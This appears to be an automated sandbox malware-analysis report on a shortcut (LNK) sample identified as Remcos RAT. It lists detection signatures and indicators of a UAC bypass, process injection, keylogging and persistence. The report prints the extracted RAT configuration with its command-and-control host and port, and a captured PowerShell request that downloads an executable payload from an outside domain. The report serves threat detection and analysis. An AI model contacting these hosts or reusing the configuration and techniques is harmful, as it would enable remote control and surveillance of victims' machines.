Windows Analysis Report
MdkbG2pK4l.lnk

Overview

General Information

Sample name:	MdkbG2pK4l.lnk renamed because original name is a hash value
Original sample name:	9ee2b12e8974f00111bb9887f7f9e19f.lnk
Analysis ID:	1518485
MD5:	9ee2b12e8974f00111bb9887f7f9e19f
SHA1:	54d2830260e949b25d291c07ebc6d29d8b4f0af8
SHA256:	f5734ae475931dbb561fc5b636d5a7825d8d99efa8d4d9cdff7e89bf163613dd
Tags:	lnkuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Windows shortcut file (LNK) starts blacklisted processes

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Powershell drops PE file

Sigma detected: Suspicious Invoke-WebRequest Execution

Switches to a custom stack to bypass stack traces

Windows shortcut file (LNK) contains suspicious command line arguments

Writes to foreign memory regions

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Sigma detected: Usage Of Web Request Commands And Cmdlets

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\paogviura	Avira: detection malicious, Label: BDS/Backdoor.Gen
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Avira: detection malicious, Label: BDS/Backdoor.Gen

Found malware configuration

Source: 20.2.cmd.exe.55000c8.7.raw.unpack

Malware Configuration Extractor: Remcos {"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\lejp	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\paogviura	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	ReversingLabs: Detection: 86%

Yara detected Remcos RAT

Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\lejp	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\paogviura	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: MdkbG2pK4l.lnk

Joe Sandbox ML: detected

Source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_1dcf3d25-f

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 20.2.cmd.exe.4fb0b57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55bfb57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52ba757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5573a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35e05ce.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4a68a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.359a901.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b8b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.55c0757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.5ff00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aae757.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc8b57.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.57d00c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474ab57.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.5199a8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51deb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4f6ba8a.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.4705a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.52b9b57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.explorer.exe.4aadb57.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.explorer.exe.557aa8a.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.DZIPR.exe.35df9ce.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.4fb1757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5274a8a.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.cmd.exe.55000c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.cc9757.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.cmd.exe.51df757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.cmd.exe.55b9757.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.explorer.exe.c83a8a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.58300c8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.explorer.exe.474b757.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.1679023505.00000000004F9000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2074816955.0000000000369000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2008670032.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.1827055009.00000000005C2000.00000008.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DZIPR.exe PID: 7580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 8164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6116, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2056, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1180, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\paogviura, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\rjhlrgwt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\lejp, type: DROPPED

Source:	Binary string: msacm32.pdbUGP source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: msacm32.pdb source: cmd.exe, 0000000E.00000002.1679242775.0000000005FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1827119501.0000000005500000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679113605.0000000000522000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 00000018.00000002.2009928671.0000000005830000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827274368.00000000005D8000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075718056.00000000057D0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2008758965.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 00000021.00000002.2074919506.0000000000392000.00000008.00000001.01000000.00000000.sdmp, lejp.20.dr, gnqpmvvlbu.24.dr
Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: fullimmersion777.com

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VOXILITYGB VOXILITYGB

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: lawyerconsult.topConnection: Keep-Alive

Source: DZIPR.exe.12.dr

String found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: lawyerconsult.top
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://c0rl.m%L
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: DZIPR.exe, 0000000C.00000002.1398577312.0000000003594000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678555697.000000000556D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826635494.0000000004F65000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679482200.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009519386.000000000526E000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827413438.0000000000C7D000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075325821.0000000005193000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009296830.0000000005574000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: hello.exe, 0000000B.00000003.1378606402.0000000002FA2000.00000004.00000020.00020000.00000000.sdmp, hello.exe, 0000000B.00000003.1379419274.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000003.1386533387.0000000003D9B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
